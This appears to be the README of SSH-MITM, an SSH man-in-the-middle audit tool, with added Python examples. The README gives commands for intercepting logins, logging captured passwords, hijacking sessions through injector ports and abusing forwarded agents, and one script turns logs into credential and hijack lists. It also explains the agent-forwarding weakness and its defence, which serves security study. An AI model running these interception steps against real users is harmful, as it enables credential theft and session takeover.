ssh mitm server for security audits supporting public key authentication, session hijacking and file manipulation
- Hijacking and logging of terminal sessions
- support for ssh commands (e.g. git over ssh)
- SCP and SFTP
- store files
- replace files
- inject additional files
- Agent Forwarding
- Port Forwarding
- Check and test clients against known vulnerabilities
- Plugin support
Connect to the network
To start an intercepting mitm-ssh server on port 10022 (the default listen port), a single command is enough.
$ ssh-mitm --remote-host 192.168.0.x
Now let's try to connect to the ssh-mitm server.
$ ssh -p 10022 user@proxyserver
You will see the credentials in the log output.
2021-01-01 11:38:26,098 [INFO] Client connection established with parameters: Remote Address: 192.168.0.x Port: 22 Username: user Password: supersecret Key: None Agent: None
Hijack SSH sessions
When a client connects, ssh-mitm starts an additional server for that session, which is used for session hijacking.
[INFO] created injector shell on port 34463
To hijack this session, you can use your favorite ssh client. All you have to do is connect to the injector port that was logged for the session.
$ ssh -p 34463 127.0.0.1
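The two log lines above are all an auditor needs to collect captured credentials and the matching hijack ports from a longer ssh-mitm run. The following parser is an added example, not part of SSH-MITM: the first connection line and the injector line are the ones shown above, the second connection line is a constructed assumption of how a public-key login with a forwarded agent would look in the same format (the exact values ssh-mitm prints in the "Key:" and "Agent:" fields are not shown on this page).

```python
"""Parse SSH-MITM log output into hijackable sessions (added example)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample log. Lines 1 and 2 are taken from the page; lines 3 and 4
# assume a public-key login with a forwarded agent in the same log format.
SAMPLE_LOG = """\
2021-01-01 11:38:26,098 [INFO] Client connection established with parameters: Remote Address: 192.168.0.x Port: 22 Username: user Password: supersecret Key: None Agent: None
2021-01-01 11:38:26,104 [INFO] created injector shell on port 34463
2021-01-01 11:40:02,511 [INFO] Client connection established with parameters: Remote Address: 192.168.0.x Port: 22 Username: git Password: None Key: SHA256:c29tZS1maW5nZXJwcmludA Agent: forwarded
2021-01-01 11:40:02,519 [INFO] created injector shell on port 34471
"""

CONNECT_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \[INFO\] Client connection established with parameters: "
    r"Remote Address: (?P<host>\S+) Port: (?P<port>\d+) Username: (?P<user>\S+) "
    # non-greedy so passwords containing spaces are captured whole
    r"Password: (?P<password>.*?) Key: (?P<key>\S+) Agent: (?P<agent>\S+)$"
)
INJECTOR_RE = re.compile(r"^\S+ \S+ \[INFO\] created injector shell on port (?P<port>\d+)$")


@dataclass
class Session:
    timestamp: str
    remote_host: str
    remote_port: int
    username: str
    password: Optional[str]            # None for public-key logins
    key_fingerprint: Optional[str]     # None for password logins
    agent_forwarded: bool
    hijack_port: Optional[int] = None  # injector shell port, once logged


def _none(value: str) -> Optional[str]:
    return None if value == "None" else value


def parse_sessions(log_text: str) -> List[Session]:
    """Pair each connection line with the injector line that follows it."""
    sessions: List[Session] = []
    for line in log_text.splitlines():
        m = CONNECT_RE.match(line)
        if m:
            sessions.append(Session(
                timestamp=m["ts"], remote_host=m["host"], remote_port=int(m["port"]),
                username=m["user"], password=_none(m["password"]),
                key_fingerprint=_none(m["key"]), agent_forwarded=m["agent"] != "None"))
            continue
        m = INJECTOR_RE.match(line)
        if m and sessions and sessions[-1].hijack_port is None:
            sessions[-1].hijack_port = int(m["port"])
    return sessions


def hijack_command(session: Session, mitm_host: str = "127.0.0.1") -> Optional[str]:
    """The ssh command line to attach to the session, as shown in the README."""
    if session.hijack_port is None:
        return None
    return f"ssh -p {session.hijack_port} {mitm_host}"


if __name__ == "__main__":
    for s in parse_sessions(SAMPLE_LOG):
        cred = f"password={s.password!r}" if s.password else f"key={s.key_fingerprint}"
        print(f"{s.username}@{s.remote_host}:{s.remote_port} {cred} "
              f"agent={s.agent_forwarded} -> {hijack_command(s)}")
```

Feed it the real log on stdin or a file instead of SAMPLE_LOG; the regexes only need adjusting if your ssh-mitm version prints the parameter line in a different order.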
SSH-MITM proxy server is capable of advanced man-in-the-middle attacks and can be used in scenarios where the remote host is not known in advance, where a single remote host is not sufficient, or where public key authentication is used.
Public key authentication
Public key authentication is a way of logging into an SSH/SFTP account using a cryptographic key rather than a password.
The advantage is that no confidential data needs to be sent to the remote host: the client only sends a signature over the current session, so a man in the middle cannot capture and replay anything useful.
Because of this design, SSH-MITM proxy server cannot reuse the data provided during authentication to log in to the real remote host.
If you need to intercept a client that uses public key authentication, there are some options.
SSH supports agent forwarding, which allows a remote host to authenticate to another remote host with the user's keys, without the private keys ever leaving the user's machine.
SSH-MITM proxy server is able to request the forwarded agent from the client and use it to authenticate to the remote host. With this feature, SSH-MITM proxy server can perform a full man-in-the-middle attack on a public key login.
To use agent forwarding, SSH-MITM proxy server must be started with --request-agent.
$ ssh-mitm --request-agent --remote-host 192.168.0.x
The client must be started with agent forwarding enabled (-A, or ForwardAgent yes in the client configuration); without it the proxy has no agent to use and the public key login fails.
$ ssh -A -p 10022 user@proxyserver
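Why a forwarded agent is enough for a full man-in-the-middle: the agent signs whatever data it is handed and has no way to tell which host's session the data belongs to. The proxy therefore opens its own connection to the real server, builds the publickey userauth data for that upstream session and asks the client's forwarded agent to sign it. The following is an added model of that exchange, not SSH-MITM's own code: the agent message framing and message numbers follow the SSH agent protocol and the signed-data layout follows RFC 4252 section 7, while the ToyAgent's "signature" is an HMAC stand-in for the real asymmetric signature (assumption made so the example runs without key material), which is why the verifying side here needs the same secret.

```python
"""Model of the agent-forwarding exchange behind --request-agent (added example)."""
import hashlib
import hmac
import struct
from typing import Dict, List, Tuple

# Message numbers from the SSH agent protocol.
SSH_AGENT_FAILURE = 5
SSH_AGENTC_REQUEST_IDENTITIES = 11
SSH_AGENT_IDENTITIES_ANSWER = 12
SSH_AGENTC_SIGN_REQUEST = 13
SSH_AGENT_SIGN_RESPONSE = 14
SSH_MSG_USERAUTH_REQUEST = 50


def put_string(b: bytes) -> bytes:
    """SSH 'string': uint32 big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def get_string(buf: bytes, off: int = 0) -> Tuple[bytes, int]:
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    if off + n > len(buf):
        raise ValueError("truncated string")
    return buf[off:off + n], off + n


def frame(msg_type: int, payload: bytes = b"") -> bytes:
    """Agent messages on the socket are string(byte type || payload)."""
    return put_string(bytes([msg_type]) + payload)


def unframe(data: bytes) -> Tuple[int, bytes]:
    body, _ = get_string(data)
    if not body:
        raise ValueError("empty agent message")
    return body[0], body[1:]


class ToyAgent:
    """Stands in for the user's ssh-agent reached over the forwarded channel.
    Assumption: signatures are HMAC-SHA256 with a per-key secret instead of a
    real private-key signature; the protocol behaviour is otherwise faithful."""
    ALG = b"toy-hmac-sha256"

    def __init__(self, keys: Dict[bytes, bytes]):
        self.keys = keys  # public key blob -> secret

    def sign(self, blob: bytes, data: bytes) -> bytes:
        mac = hmac.new(self.keys[blob], data, hashlib.sha256).digest()
        return put_string(self.ALG) + put_string(mac)

    def handle(self, request: bytes) -> bytes:
        msg_type, payload = unframe(request)
        if msg_type == SSH_AGENTC_REQUEST_IDENTITIES:
            body = struct.pack(">I", len(self.keys))
            for blob in self.keys:
                body += put_string(blob) + put_string(b"toy key")
            return frame(SSH_AGENT_IDENTITIES_ANSWER, body)
        if msg_type == SSH_AGENTC_SIGN_REQUEST:
            blob, off = get_string(payload)
            data, off = get_string(payload, off)   # uint32 flags follow, ignored
            if blob not in self.keys:
                return frame(SSH_AGENT_FAILURE)
            return frame(SSH_AGENT_SIGN_RESPONSE, put_string(self.sign(blob, data)))
        return frame(SSH_AGENT_FAILURE)


# --- proxy side: what the man in the middle does with the forwarded agent ---

def list_identities(agent: ToyAgent) -> List[bytes]:
    msg_type, payload = unframe(agent.handle(frame(SSH_AGENTC_REQUEST_IDENTITIES)))
    if msg_type != SSH_AGENT_IDENTITIES_ANSWER:
        raise RuntimeError("agent did not list identities")
    (n,) = struct.unpack_from(">I", payload, 0)
    off, blobs = 4, []
    for _ in range(n):
        blob, off = get_string(payload, off)
        _comment, off = get_string(payload, off)
        blobs.append(blob)
    return blobs


def sign_via_forwarded_agent(agent: ToyAgent, blob: bytes, data: bytes) -> bytes:
    req = frame(SSH_AGENTC_SIGN_REQUEST, put_string(blob) + put_string(data) + b"\x00\x00\x00\x00")
    msg_type, payload = unframe(agent.handle(req))
    if msg_type != SSH_AGENT_SIGN_RESPONSE:
        raise RuntimeError("agent refused to sign")
    sig, _ = get_string(payload)
    return sig


def userauth_signed_data(session_id: bytes, user: bytes, blob: bytes) -> bytes:
    """Data signed for 'publickey' userauth (RFC 4252 section 7). The session_id
    is the one of the proxy's *upstream* connection, which the agent cannot see."""
    return (put_string(session_id) + bytes([SSH_MSG_USERAUTH_REQUEST]) + put_string(user)
            + put_string(b"ssh-connection") + put_string(b"publickey") + b"\x01"
            + put_string(ToyAgent.ALG) + put_string(blob))


def server_verify(secret: bytes, session_id: bytes, user: bytes, blob: bytes, sig: bytes) -> bool:
    """The real server's check (symmetric here because of the HMAC stand-in)."""
    alg, off = get_string(sig)
    mac, _ = get_string(sig, off)
    expected = hmac.new(secret, userauth_signed_data(session_id, user, blob), hashlib.sha256).digest()
    return alg == ToyAgent.ALG and hmac.compare_digest(mac, expected)


def mitm_login_upstream(agent: ToyAgent, upstream_session_id: bytes, user: bytes, secret: bytes) -> bool:
    """Full flow: enumerate the victim's keys, get a signature for the upstream
    session, present it to the real server."""
    blob = list_identities(agent)[0]
    sig = sign_via_forwarded_agent(agent, blob, userauth_signed_data(upstream_session_id, user, blob))
    return server_verify(secret, upstream_session_id, user, blob, sig)
```

The defence follows directly from the model: do not forward the agent to hosts you do not fully trust, and verify the proxy's host key, because the only thing that distinguishes the proxy from the real server at this point is the host key the client accepted.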
In most cases, when git is used over ssh, public key authentication is used. The git command itself has no option to forward the agent.
To enable agent forwarding, git has to be executed with the GIT_SSH_COMMAND environment variable pointing at an ssh command with -A.
# start the ssh server
ssh-mitm --remote-host github.com --request-agent --scp-interface debug_traffic
# invoke git commands
GIT_SSH_COMMAND="ssh -A" git clone ssh://firstname.lastname@example.org:10022/ssh-mitm/ssh-mitm.git
When ssh-mitm is used to intercept rsync, the proxy port must be passed to rsync through its -e option, and the agent can be forwarded there as well if needed.
To sync a local directory with a remote directory through the proxy, rsync can be executed with the following parameters.
rsync -r -e 'ssh -p 10022 -A' /local/folder/ email@example.com:/remote/folder/
SSH-MITM has several checks and exploits for known client vulnerabilities integrated, which can be used to audit various ssh clients such as OpenSSH and PuTTY.
Full Documentation: https://docs.ssh-mitm.at